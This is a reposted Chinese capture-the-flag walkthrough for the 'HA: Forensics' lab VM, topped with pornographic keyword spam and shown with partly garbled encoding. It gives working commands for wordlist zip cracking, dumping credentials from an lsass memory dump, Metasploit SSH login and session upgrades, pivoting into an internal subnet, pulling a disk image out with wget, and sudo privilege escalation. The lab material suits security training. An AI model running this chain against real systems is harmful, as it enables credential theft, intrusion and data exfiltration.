日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 人文社科 > 生活经验 >内容正文

生活经验

HA: Forensics靶机渗透测试

發(fā)布時間:2023/11/28 生活经验 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 HA: Forensics靶机渗透测试 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

文章目錄

        • 靶機說明:
      • 一、信息收集
        • 1.主機發(fā)現(xiàn)
        • 2.端口掃描
      • 二、漏洞挖掘
        • 1.訪問靶機 web 服務(wù)
        • 2.使用 dirb 進行目錄掃描
        • 3.使用 exiftool 提取數(shù)據(jù)
        • 4.使用 dirb 掃描 txt 文件
        • 5.PGP解密
        • 6.破解密碼
        • 7.分析 lsass.DMP 文件
      • 三、使用 msfconsole 進行后滲透
        • 1.kali 打開 msfconsole ,search ssh/ssh_login
        • 2.利用該模塊
        • 3.查看當前所有·會話信息
        • 4.升級會話
        • 5.進入會話并查看網(wǎng)絡(luò)連接
        • 6.橫向滲透
      • 四、磁盤鏡像取證
        • 1.打開 kali 自帶工具 autopsy
        • 2.火狐訪問 http://localhost:9999/autopsy
      • 五、提權(quán)
        • 1.回到靶機shell,查看所有用戶
        • 2.查看可 sudo 執(zhí)行的命令
        • 3.直接提權(quán)

靶機說明:

哈:法醫(yī)學是實驗室的中級水平,它能讓你在網(wǎng)絡(luò)法醫(yī)調(diào)查中親身體驗。這個實驗室完全致力于網(wǎng)絡(luò)法醫(yī)調(diào)查的方法和工具,并且有各種技術(shù)可以找到的證據(jù)。由于這是一個捕獲旗幟的過程,因此需要注意的是,這不是一個根本性的挑戰(zhàn),而是找到所有旗幟的主要動機。
旗數(shù):4
目標:找到所有4個標志(獲取根不是目標)

一、信息收集

1.主機發(fā)現(xiàn)

arp-scan -l

發(fā)現(xiàn)靶機 ip:192.168.1.201

2.端口掃描

nmap -A -p- 192.168.1.201


發(fā)現(xiàn)靶機開啟了 80 端口,Apache 服務(wù);22 端口,ssh 服務(wù)

二、漏洞挖掘

1.訪問靶機 web 服務(wù)


發(fā)現(xiàn)一些關(guān)于指紋的圖片,點擊右上角 get flag,發(fā)現(xiàn)作者整活,未發(fā)現(xiàn)其他有用信息

2.使用 dirb 進行目錄掃描

dirb http://192.168.1.201


發(fā)現(xiàn) /images/ 目錄,見名知意應(yīng)該是存放圖片的目錄
訪問該路徑發(fā)現(xiàn)若干圖片,其中有名為 DNA 和 fingerprint(指紋)的可疑圖片,經(jīng)過測試發(fā)現(xiàn) DNA 沒有有用信息

3.使用 exiftool 提取數(shù)據(jù)

apt-get install exiftool    #kali并未自帶此工具,使用該命令更改
exiftool fingerprint.jpg


發(fā)現(xiàn) flag1
Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}

4.使用 dirb 掃描 txt 文件

dirb http://192.168.1.201 -X .txt


發(fā)現(xiàn)在網(wǎng)站根目錄下有個 tips.txt 文件
訪問該文件(這里我換了網(wǎng)絡(luò)環(huán)境,靶機ip為192.168.2.192)

發(fā)現(xiàn)一個路徑一個 zip 壓縮文件
1)訪問 http://192.168.2.192/flag.zip 進行下載 zip 文件,解壓時發(fā)現(xiàn)需要密碼

2)訪問 http://192.168.2.192/igolder 發(fā)現(xiàn)該路徑下有 clue.txt 文件,打開發(fā)現(xiàn) PGP 加密

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0lQOsBF9sr70BCACvH5Vs2Lp9nyVIbVk4yraUmxDBxPJNitlU/IqcR2d+UDEORbDl
UClLXSqapjBFuu24p86SIcv/1VktRh79lnL5j4uKSAEuI/t6SJW4hlfovVBndUvT
X61w6TRJlLq5AsLOS38PWpIgL1ECIqliwNfCjjlvQd8xm/C9BV1lqM71JYtW34ST
XsKzxomVqGtWvrzs/tFege20z12JtqgPmqGApXzNjI4y7iH0vvVS8nCF58nwyjoH
wbx6EXk002hDe0/W7tsCGhp3gU5wzkUy4kfBfVrLp0/23kA/k4iJvlMPMAeQoJPx
AymXmXEKlp+igBrBicBw68SZgLAQhg8ZO2ybABEBAAH/AwMC/MDF76NvTu1gM8Y7
xjKap2L3OY8xeOoAeMQUueabuTP2rl7jB6YfsEcQj4xDjz0SBXIQxP0PziHpXTk3
v5FlH5nhSWZI6OgN0HF6rdjByKT4CNlkt7IVIPEQc7IidQP5K1/YhbghysyYHyBH
3TRAEwJszcjj6TsAOM1mpLXlPweM1sC3ms8xoFVSipPcHviNcQq58zLpGcWvmmuc
ZfqrRBqfpU/wZEmEvcDW1FOCvq/Bqo1psPOXYfI+ul7C0MLObmzi/u2p7EJLwf2E
tGBJ++wLdProHJHovp0WlQSHFamOWmM5p9SAq7lMegvIn3NHe0ZQS2agjBzNiMW5
LK/dZ0i1lX1SSRNNOlLC+Tf/v6bS8gAD+WSGsYEITPcRP2OpCiCBoa4d7GsK7nyF
RHIngmJrp5g1agayG92ahUFRLqQ7KGa+hu3N8/pM+x/dNH1Uw/jhKHsacpgBBCPf
Zs/NZlcMbCI0TD6CFKe2QCEnOW6iLlOEgV2ptEPJLkinaFZ8BEf5HYHUhW1CqwTZ
otvsmzkijYDvaV77zylVqb9gMJelVNWLZG3fcw+eCGF1wBBxno99xcxEgJpzdOeH
TnU3yQ1JllZb/0jQ7vBq22hrOTYo9iRBe/XOnUj1+J8QVynYLcgvEx8I8/tXnfNM
/bQkwbEohnTzklDWWKrqBXlXOTpBKZL4bk+k0U5wMpOQOkCgiHTMmklmAV/+0S/G
5EDrNNdCDCIdtXtAHJjIUtVivNNyQIgVuImYbhbXcSWziX0IT0QkRGSz8a+/MKl3
0yItTNXi/KpnOt+xfvjavzPscXyKyt7+82feOsl4f/jDFZW6P4NifjWGeP+9Q8FA
MPPZ/xDjhIgBvsqLpGDEuYp7VTVxWWIUtzao7P4WzLQAiQEcBBABAgAGBQJfbK+9
AAoJEF0YY4bPiiBW83YH/jU75ZqnBG3yJGOYa7qapXIPc/Dg6jc1FuivWlphZs8C
PSog9kqEqlY3k5OY03YBMIRgWMI2UyCgiSPcgwF8bGXm8hPQgL0QN5cFX7uubH9S
ofeM+SyRRSpuXtcWgljHe6e/ABR533bwLdk6YyHf4YyCxCDxWZRdI/FyoRYrh7q4
CTfgVJoiem1P9sViva28IBJ+H1ctyioWVEkKz1/PW9NBYy9mTbmVlwdWW1IzXRiS
OcXu0tW1rawJ/z5SwCwjKZxvSm2Hfk9eguEojbfPIoXauNRH00u4tEHO6YjD54ZC
DxpZfSHSCsOWEfOAA5EO+uDGSY4+WB6ihKmCV+i68Jc=
=KoPg
-----END PGP PRIVATE KEY BLOCK----------BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0hQEMA10YY4bPiiBWAQf8DaEoVUWpzj5+3WMZcOhjfXo6Hk+MKD5TLWy5XndaEXRZ
3+aUQuECr88LG83BzmAS1MITHf7xifx4aiqgeM6bGILlvseP9W2Fmv9E5KOVLUYI
T8V3jINwmNg7FinwuYlT2ld2yU1qMwiEZ8GPTK4U90WSZh+/dYnKTVKxjdEZXlj9
FF42BygUxjJgEDFQi0HhUb7AX+tYQIQV0p5DZcTETZweyM9OBcwuhwzspjKp3Rz9
zFcnnCEZ4+JbdXTcXPD9cTBHJhWk01lclg+XR4v572HilznzWFutqcWrMuhBO0UZ
q0v1MOG03o8MN2VysMgbk8gEdOs+GE8fPBtsKqS5tsmhcwZR3QA/BctqAT+IhYtI
s7j0pd+mTG+zvQu5B41isicBb0yLA80YVlfWjjUmZAAF4oowPKJWY9CQIap39Ked
cbLU2+CI3JJf7JZvcZK4KGeuYgpRXU8Jvu3BHSEu1zCHGgieYRW254OJYZcJYFx6
v+6OPq+UNCBbhAFRjJpkOigA+GgH5lGf0vRYM/gz5vA4MDRrEojFs9DIwATbflqN
QOs=
=Y9OD
-----END PGP MESSAGE-----

5.PGP解密

訪問 https://www.igolder.com/PGP/decryption/ 進行在線解密
解密后發(fā)現(xiàn)提示:
如果法醫(yī)忘記了他的密碼,這個提示可以幫助他,其中密碼是6個字符長,開始3個字符是單詞“for”,結(jié)束3個字符是數(shù)字

6.破解密碼

1)使用 crunch 或腳本生成密碼本

crunch 6 6 -t for%%% -o dict.txt 

2)使用 fcrackzip 利用密碼本破解密碼

fcrackzip -u -D -p dict.txt flag.zip

3)使用密碼解密

unzip flag.zip
for007


解壓后得到 flag.pdf、lsass.DMP 文件
打開 flag.pdf 得到 flag2
Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}

7.分析 lsass.DMP 文件

1)使用 pypykatz 檢查內(nèi)存轉(zhuǎn)儲文件

pypykatz lsa minidump ./lsass.DMP 



發(fā)現(xiàn)兩個明文用戶名和 NTML 加密的密碼,發(fā)現(xiàn)其密碼相同
在網(wǎng)站 https://www.cmd5.com/ 對其進行解密
得到密碼 Password@1

三、使用 msfconsole 進行后滲透

1.kali 打開 msfconsole ,search ssh/ssh_login

msfconsole
msf> search ssh/ssh_login

2.利用該模塊

use 0
show options
set rhosts 192.168.1.111    #靶機IP地址,這里我右換了個網(wǎng)絡(luò)QAQ
set username jasoos
set password Password@1
run

3.查看當前所有·會話信息

sessions -l

4.升級會話

sessions -u 1

5.進入會話并查看網(wǎng)絡(luò)連接

sessions 2
ifconfig


發(fā)現(xiàn)有多個網(wǎng)絡(luò)連接其中有一個內(nèi)部 ip 172.17.0.1,我們不能從外部直接進行訪問考慮使用靶機作為跳板

6.橫向滲透

1)使用 exit 退出當前 meterpreter shell
再次升級 shell

exit
sessions -u 1


2)添加路由

use post/multi/manage/autoroute
set session 3
run


3)探測主機

use post/multi/gather/ping_sweep
set session 3
set rhosts 172.17.0.0/24
run


發(fā)現(xiàn) 127.17.0.1、127.17.0.2
4)端口掃描

use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-1000
run


發(fā)現(xiàn) 21 端口(ftp)開放
5)測試 ftp 是否可匿名登陸

use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
run


發(fā)現(xiàn)可以匿名登陸

6)進入 ftp,查看文件

sessions 3
shell
python -c "import pty;pty.spawn('/bin/bash')"
ftp 172.17.0.2
anonymous
ls
cd pub
ls


發(fā)現(xiàn)有 saboot.001 文件,使用 get 獲取

get saboot.001

7)使用 python 簡單服務(wù)器進行傳輸文件

python -m SimpleHTTPServer 8888


8)kali 獲取文件

wget http://192.168.1.111:8888/saboot.001


9)分析文件

發(fā)現(xiàn)該文件是個磁盤鏡像

四、磁盤鏡像取證

1.打開 kali 自帶工具 autopsy


2.火狐訪問 http://localhost:9999/autopsy

1)新建任務(wù)

2)填寫信息









重新訪問該工具服務(wù)






加載磁盤鏡像后發(fā)現(xiàn)了 flag3.txt、 creads.txt:
Flag:3 {8442460f48338fe60a9497b8e0e9022f}
amVlbmFsaWlzYWdvb2RnaXJs
發(fā)現(xiàn) creads.txt 中字符疑似 base64 加密,進行解密

得到明文 jeenaliisagoodgirl 疑似用戶密碼

五、提權(quán)

1.回到靶機shell,查看所有用戶


發(fā)現(xiàn) forensic 用戶,嘗試使用 ssh 進行連接

ssh forensic@192.168.1.111
yes
jeenaliisagoodgirl

2.查看可 sudo 執(zhí)行的命令

sudo -l


發(fā)現(xiàn)可以執(zhí)行所有命令

3.直接提權(quán)

總結(jié)

以上是生活随笔為你收集整理的HA: Forensics靶机渗透测试的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。